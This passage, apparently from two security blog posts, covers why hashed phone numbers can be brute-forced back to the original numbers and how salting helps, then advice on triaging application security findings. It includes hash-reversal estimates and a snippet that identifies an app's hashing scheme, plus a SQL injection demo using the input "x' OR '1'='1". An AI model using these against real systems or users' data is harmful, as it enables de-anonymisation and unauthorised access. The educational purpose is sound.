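    print("%d -> %d" % (n, toy_hash(n)))   # 1 and 4 collide, 2 and 5 collide, 3 and 6 collide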

A key point is that, with a hashing algorithm, for any output there are theoretically an infinite number of inputs that can produce it, and thus it is a one-way, irreversible process.

A second key point is that any input gives the same output every time. So, by checking if the hashes of two items are the same you can be pretty sure they are from the same source material.

Cooking Some Phone Number Hash(es)

(All calculations are approximate, if I’m not out by two orders of magnitude then…)

Phone numbers conform to a rather well known format, or set of formats. A modern GPU can run about 20 million hashes per second (2*10^7), or about 1.7 trillion (1.7*10^12) per day. So, how does this fit with possible phone numbers?

A pretty standard phone number is made up of 1-3 digits for a country code, 3 for an area code, and 7 more digits, with perhaps 4 for an extension.

So, we have the following range of numbers:

0000000000000-0000 to 9999999999999-0000

Or, 10^13 possible numbers… About six days’ work at that rate to compute all possible values (and a LOT of storage space…)

If we now represent it in a few other forms that may occur to programmers…

+001 (234) 567-8910, 0012345678910, 001-234-5678910, 0012345678910(US), 001(234)5678910

We have maybe 10-20 times that, or a few months of calculation…

But, real world phone numbers don’t fill all possible values. For instance, take a US phone number. It is also made up of the country code, 3 digits for the area code, and 7 more digits, with perhaps 4 for the extension. But:

  • The country code is known
  • The area code is only about 35% used since only 350 values are in use
  • The 7 digit codes are not completely full (let’s guess 80%)
  • Most numbers do not use extensions (let’s say 5% use them)

Now, we only have 350 * (10 000 000 * .8) * 1.05 or 2.94 billion combinations (2.94*10^9). That is only a little over two minutes on a modern GPU. Even allowing for different representations of numbers you could store that in a few gigabytes of RAM for instant lookup, or recalculate every time and take longer. This is what is called a time-space tradeoff: the space of the memory versus the time to recalculate.
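Here is the same back-of-the-envelope math in code form, using only the rates and assumptions stated above:

hashes_per_second = 2e7                        # ~20 million hashes/sec on one GPU
seconds_per_day = 86400.0

full_keyspace = 10 ** 13                       # every possible 13-digit number
print(full_keyspace / (hashes_per_second * seconds_per_day))   # ~5.8 days for the full space

area_codes = 350                               # only ~350 of the 1000 codes in use
subscriber_numbers = 10 ** 7 * 0.8             # assume ~80% of the 7-digit space used
extension_factor = 1.05                        # ~5% of numbers add an extension

realistic = area_codes * subscriber_numbers * extension_factor
print(realistic)                               # ~2.94e9 combinations
print(realistic / hashes_per_second)           # ~147 seconds, a little over two minutes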

Anyway, the two takeaways for our discussion here regarding privacy are:

1. Every unique output value probably corresponds to a unique input value, so this hashing anonymisation still has privacy concerns.
Since the number of possible phone numbers is far smaller than the collision space of even a broken hashing algorithm, there is little chance of collisions.

2. Phone numbers can be reverse computed from raw hashes alone.
Because of the known constraints on input values, it is possible either to brute-force the values or to build a reasonably sized rainbow table on a modern system.

Hashing Does NOT Guarantee Privacy

Anonymising data by removing specific user identifying information but leaving in unique identifiers does not work to assuage privacy concerns. This is because often clues are in the data, or in linkages between the data. AOL learned this the hard way when they released “anonymised” search data.

Furthermore, the network effect can reveal a lot about you: how many people you connect to, and how many they connect to, can be a powerful identifier of you, not to mention predict a lot of things like your career area and salary point (since more connections tend to mean richer).

For a good discussion of some of the privacy issues related to hashes see Matt Gemmell’s post, Hashing for Privacy in social apps.

Mobile apps also often send the device hardware identifier (which cannot be changed or removed) to servers and advertising networks. And I have also observed the hash of this (or the WiFi MAC address) sent through. This hardly helps accomplish anything, as anyone who knows the device ID can hash it and look for that, and anyone who knows the hash can look for it, just as with the phone numbers. This hash is equally unique to my device, and unable to be changed.

Hashing Does not equal Secrecy

As discussed under “cooking some hash(es)” it is possible to work back from a hash to the input since we know some of the constraints operating upon phone numbers. Furthermore, even if we are not sure exactly how you are hashing data then we can simply put test data in and look for known hashes of it. If I know what 123456789 hashes to and I see it in the output, then I know how your app is hashing phone numbers.
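In practice that test is a few lines of Python: hash a number you planted yourself in a handful of likely formats and grep the app’s outbound traffic for any of the results (the formats and algorithms here are guesses you would tailor to the app):

import hashlib

planted = "123456789"                     # a value you control in your own address book
formats = (planted, "+1" + planted, "001" + planted)
for fmt in formats:
    for algo in ("md5", "sha1", "sha256"):
        print("%s  %-6s %s" % (hashlib.new(algo, fmt.encode("utf-8")).hexdigest(), algo, fmt))
# If any of these digests appear in the traffic, you know how the app hashes numbers.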

The Full Solution to Privacy and Secrecy: Salt

Both of these issues can be greatly helped by increasing the complexity of the input into the hash function. This can both remove the tendency for anonymised data to carry identical identifiers across instances, and also reduce the chance of it becoming feasible to reverse-calculate all possible values. Unfortunately there is no perfect solution to this if user-matching functionality comes first.

The correct solution as it should be used to store passwords, entry-specific salting (for example with bcrypt), is not feasible for a matching algorithm: it will only work for comparing hashed input to stored hashes, and it will not work for comparing stored hashes to stored hashes.

However, if you as a developer are determined to make a server side matching service for your users, then you need to apply a hybrid approach. This is not good practice for highly sensitive information, but it should retain the functionality needed for server side matching.

Your first privacy step is to make sure your hashes do not match those collected or used by anyone else; do this by adding some constant secret to them, a process called salting.

e.g., adding 9835476579080945368095468905486 to the start of every number before you hash

This will make all of your hashes different from those used by any other developer, but they will still compare properly with each other. The same input will give the same output.

However, there is still a problem – if your secret salt is leaked or disclosed, the reversing attacks outlined earlier become possible. To avoid this, increase the complexity of input by hashing more complex data. So, rather than just hashing the phone number, hash the name, email, and phone number together. This does introduce the problem of causing hashes to disagree if any part of the input differs by misspellings, typos, etc…
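Putting both suggestions together, a server-side matching token might look something like this sketch (the salt value and the choice of fields are illustrative only, and this is still not appropriate for highly sensitive data):

import hashlib

APP_SALT = "9835476579080945368095468905486"   # constant secret, unique to your app

def matching_token(name, email, phone):
    # Normalise first so harmless differences (case, whitespace) don't break matching
    material = "|".join(part.strip().lower() for part in (name, email, phone))
    return hashlib.sha256((APP_SALT + material).encode("utf-8")).hexdigest()

The same contact details always produce the same token, so server-side matching still works, but the tokens cannot be compared with hashes collected by any other app, and reversing them requires knowing the salt and guessing three fields at once rather than one.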

The best way to protect your user’s data from disclosure, and your reputation from damage due to a privacy breach:

  • Don’t collect or send sensitive user data or hashes in the first place – using the security principle of least privilege.
  • Ask for access in a very obvious and unambiguous way – informed consent.

Hit me/us up on twitter ( @neohapsis or @secvalve) if you have any comments or discussion. (Especially if I made an error!)

[Update] Added author byline and clarified some wording.

Groundhog Day in the Application Security World

By Kate Pearce, a Security Consultant and Researcher at Neohapsis

Throughout the US on Groundhog Day, an inordinate amount of media attention will be given to small furry creatures and whether or not they emerge into bright sunlight or cloudy skies. In a tradition that may seem rather topsy-turvy to those not familiar with it, the story says that if the groundhog sees his shadow (indicating the sun is shining), he returns to his hole to sleep for six more weeks and avoid the winter weather that is to come.

Similarly, when a company comes into the world of security and begins to endure the glare of security testing, the shadow of what they find can be enough to send them back into hiding. However, with the right preparation and mindset, businesses can not only withstand the sight of insecurity, they can begin to make meaningful and incremental improvements to ensure that the next time they face the sun the shadow is far less intimidating.

Hundreds or thousands of issues – Why?

It is not uncommon for a Neohapsis consultant to find hundreds of potential issues to sort through when assessing a legacy application or website for the first time. This can be due to a number of reasons, but the most prominent are:

  1. Security tools that are paranoid/badly tuned/misunderstood
  2. Lack of developer security awareness
  3. Threats and technologies have evolved since the application was designed/deployed/developed

Security Tools that are Paranoid/Badly Tuned/Misunderstood

Security testing and auditing tools, by their nature, have to be flexible and able to work in most environments and at various levels of paranoia. Because of this, if they are not configured and interpreted with the specifics of your application in mind they will often find a large number of issues, of which the majority are noise that should be ignored until the more important issues are fixed. If you have a serious, unauthenticated SQL injection that exposes plain-text credit card and payment details, you probably shouldn’t spend a moment’s thought stressing about whether your website allows 4 or 5 failed logins before locking an account.

Lack of Developer Security Awareness

Developers are human (at least in my experience!), and have all the usual foibles of humanity. They are affected by business pressures to release first and fix bugs later, with the result that security bugs may be de-prioritized down as “no-one will find that” and so “later” never comes. Developers also are often taught about security as an addition rather than a core concept. For instance, when I was learning programming, I was first taught to construct SQL strings and verbatim webpage output and only much later to use parameterized queries and HTML encoding. As a result, even though I know better, I sometimes find myself falling into bad practices that could introduce SQL injection or cross-site scripting, as the practices that introduce these threats come more naturally to me than the secure equivalents.
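The difference between the two habits is small in code but large in consequence; here is a minimal Python/sqlite3 sketch (the table and data are invented for illustration):

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'admin')")

user_input = "x' OR '1'='1"

# The habit many of us were taught first: string concatenation, injectable
query = "SELECT role FROM users WHERE name = '" + user_input + "'"
print(conn.execute(query).fetchall())     # returns rows it never should have

# The secure habit: a parameterized query treats the input purely as data
print(conn.execute("SELECT role FROM users WHERE name = ?", (user_input,)).fetchall())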

Threats and Technologies have Evolved Since the Application was Designed/Deployed/Developed

To make it even harder to manage security, many legacy applications are developed in old technologies which are either unaware of security issues, have no way of dealing with them, or both. For instance, while SQL injection has been known about for around 15 years, and cross-site scripting a little less than that, some threats are far more recent, such as clickjacking and CSS history stealing.

When an application was developed without awareness of a threat, it is often more vulnerable to it, and when it was built on a technology that was less mature in approaching the threat remediating the issues can be far more difficult. For instance, try remediating SQL injection in a legacy ASP application by changing queries from string concatenation to parameterized queries (ADODB objects aren’t exactly elegant to use!).

Dealing with issues

Once you have found issues, then comes the daunting task of prioritizing, managing, and preventing their reoccurrence. This is the part that can bring the shock, and the part that can require the most care, as this is a task in managing complexity.

The response to issues requires not only looking at what you have found previously, but also what you have to do, and where you want to go. Breaking this down:

  1. Understand the Past – Deal with existing issues
  2. Manage the Present – Remedy old issues, prevent introduction of new issues where possible
  3.  Prepare for the Future – Expect new threats to arise

Understand the Past – Deal with Existing Issues

When dealing with security reports, it is important to always be psychologically and organizationally prepared for what you find. As already discussed, this is often unpleasant and the first reactions can lead to dangerous behaviors such as overreaction (“fire the person responsible”) or disillusionment (“we couldn’t possibly fix all that!”). The initial results may be frightening, but flight is not an option, so you need to fight.

To understand what you have in front of you, and to react appropriately, it is imperative that the person interpreting the results understands the tools used to develop the application; the threats surrounding the application; and the security tool and its results. If your organization is not confident in this ability, consider getting outside help or consultants (such as Neohapsis) in to explain the background and context of your findings.

 Manage the present – Remedy old issues, prevent introduction of new issues where possible

Much like any software bug or defect, once you have an idea of what your overall results mean you should start making sense of them. This can be greatly aided through the use of a system (such as Neohapsis Security Manager) which can take vulnerability data from a large number of sources and track issues across time in a similar way to a bug tracker.

Issues found should then be dealt with in order of the threat they present to your application and organization. We have often observed a tendency to go for the vulnerabilities labeled as “critical” by a tool, irrespective of their meaning in the context of your business and application. A SQL injection bug in your administration interface that is only accessible by trusted users is probably a lot less serious than a logic flaw that allows users to order items and modify the price communicated and charged to zero.

Also, if required, your organization should rapidly institute training and awareness programs so that no more avoidable issues are introduced. This can be aided by integrating security testing into your QA and pre-production testing.

 Prepare for the future – Expect new threats to arise

Nevertheless, even if you do everything right, and even if your developers do not introduce any avoidable vulnerabilities, new issues will probably be found as the threats evolve. To detect these, you need to regularly have security tests performed (both human and automated), keep up with the security state of the technologies in use, and have plans in place to deal with any new issues that are found.

Closing

It is not unusual to find a frightening degree of insecurity when you first bring your applications into the world of security testing, but diving back to hide is not prudent. Utilizing the right experience and tools can turn being afraid of your own shadow into being prepared for the changes to come. After all, if the cloud isn’t on the horizon for your company then you are probably already immersed in it.